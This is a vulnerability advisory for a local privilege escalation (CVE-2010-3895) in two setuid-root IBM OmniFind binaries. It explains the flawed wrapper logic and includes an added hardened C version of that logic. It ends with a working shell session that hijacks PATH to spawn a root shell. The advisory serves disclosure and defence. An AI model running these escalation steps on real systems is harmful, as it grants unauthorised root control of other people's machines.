# Title : IBM OmniFind Privilege Escalation Vulnerability
# Published : 2010-11-09
# Author : Fatih Kilic
* Privilege escalation in two applications (CVE-2010-3895)
The setuid-root bit is set on the applications "esRunCommand" and "estaskwrapper".
-------------------------------------------------------------------------
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper
-------------------------------------------------------------------------
"esRunCommand" takes one argument and runs it as root. See the example below.
-------------------------------------------------------------------------
-rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
joemueller@XXX:/opt/IBM/es/bin> ./esRunCommand id
OUTPUT: cmd is id
id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------
The application "estaskwrapper" is meant to start the application "estasklight".
The pseudo C code looks like this:
-------------------------------------------------------------------------
int main(int argc, char **argv) {
    int auth = 0;
    char *path;
    ...
    if (strcmp(argv[1], "estasklight") == 0) {
        auth = 1;
        ...
        path = getenv("ES_LIBRARY_PATH");
        if (path) {
            setenv("LD_LIBRARY_PATH", path, 1);  /* caller-controlled value handed to the child */
            setenv("LIBPATH", path, 1);
            ...
            if (auth) {
                execvp("estasklight", args);     /* relative name: resolved via the caller's PATH */
            }
            ...
        }
        ...
    }
    ...
}
-------------------------------------------------------------------------
Explanation of the code:
"argv[1]" is the first command line argument; it is compared with the string
"estasklight" and, if equal, the "auth" flag is set.
If the user has the environment variable "ES_LIBRARY_PATH" set, its value is
copied into two new environment variables, "LD_LIBRARY_PATH" and "LIBPATH".
If the "auth" flag is set, the application "estasklight" is executed by name
through execvp, which resolves it using the caller's PATH.
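For contrast, a hardened version of the wrapper logic, added here as an illustration and not IBM's code: the task name is allow-listed by exact match, the child is started by absolute path with execve (so the caller's PATH is never searched), and the child receives a freshly built environment from which loader variables (LD_*, LIBPATH), PATH, IFS and ES_LIBRARY_PATH have been dropped. The directory /opt/IBM/es/bin as the location of estasklight and the fixed PATH value are assumptions.

```c
/* Hardened estaskwrapper logic (illustration, not the vendor's code).
 * Assumptions: estasklight is installed in /opt/IBM/es/bin, and the child
 * only ever needs the fixed PATH below. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define TASK_DIR  "/opt/IBM/es/bin"      /* assumed install dir of estasklight */
#define SAFE_PATH "PATH=/usr/bin:/bin"   /* chosen by the wrapper, not the caller */

/* 1. Allow-list the task name: exact string match, nothing else. */
int is_allowed_task(const char *name)
{
    return name != NULL && strcmp(name, "estasklight") == 0;
}

/* 2. Turn the name into an absolute path so exec never consults PATH.
 * Returns 0 on success, -1 if the name is not allowed, contains a '/'
 * or does not fit in the buffer. */
int resolve_task_path(const char *name, char *out, size_t outlen)
{
    if (!is_allowed_task(name) || strchr(name, '/') != NULL)
        return -1;
    int n = snprintf(out, outlen, "%s/%s", TASK_DIR, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* 3. Build the child's environment from scratch: copy only harmless
 * entries, drop anything the caller could use to steer the child, and
 * append a fixed PATH. 'out' must have room for at least 'max' >= 2
 * pointers. Returns the number of entries written (NULL terminator
 * not counted). */
size_t filter_env(char *const *in, char **out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; in[i] != NULL && n + 2 < max; i++) {
        const char *v = in[i];
        if (strncmp(v, "LD_", 3) == 0 ||
            strncmp(v, "LIBPATH=", 8) == 0 ||
            strncmp(v, "PATH=", 5) == 0 ||
            strncmp(v, "IFS=", 4) == 0 ||
            strncmp(v, "ES_LIBRARY_PATH=", 16) == 0)
            continue;
        out[n++] = (char *)v;
    }
    out[n++] = SAFE_PATH;
    out[n] = NULL;
    return n;
}

int main(int argc, char **argv, char **envp)
{
    char path[256];
    char *env[64];

    if (argc != 2 || resolve_task_path(argv[1], path, sizeof path) != 0) {
        fprintf(stderr, "usage: estaskwrapper estasklight\n");
        return 2;
    }
    filter_env(envp, env, sizeof env / sizeof env[0]);

    char *const args[] = { path, NULL };
    execve(path, args, env);   /* absolute path + clean env: no PATH lookup, no LD_* */
    perror("execve");
    return 1;
}
```

The two changes that matter against the session below are the absolute path in execve (a copy of /bin/sh named estasklight in the caller's PATH is never found) and the rebuilt environment (ES_LIBRARY_PATH is no longer copied into LD_LIBRARY_PATH and LIBPATH). Whether the child should keep running as root at all is a separate design question the wrapper cannot answer on its own.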
Exploit for running /bin/sh
-------------------------------------------------------------------------
joemueller@XXX:~> cp /bin/sh ~/bin/estasklight
joemueller@XXX:~> export ES_LIBRARY_PATH=/home/joemueller
joemueller@XXX:~> export PATH=/home/joemueller/bin:$PATH
joemueller@XXX:~> /opt/IBM/es/bin/estaskwrapper estasklight
XXX:~# id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------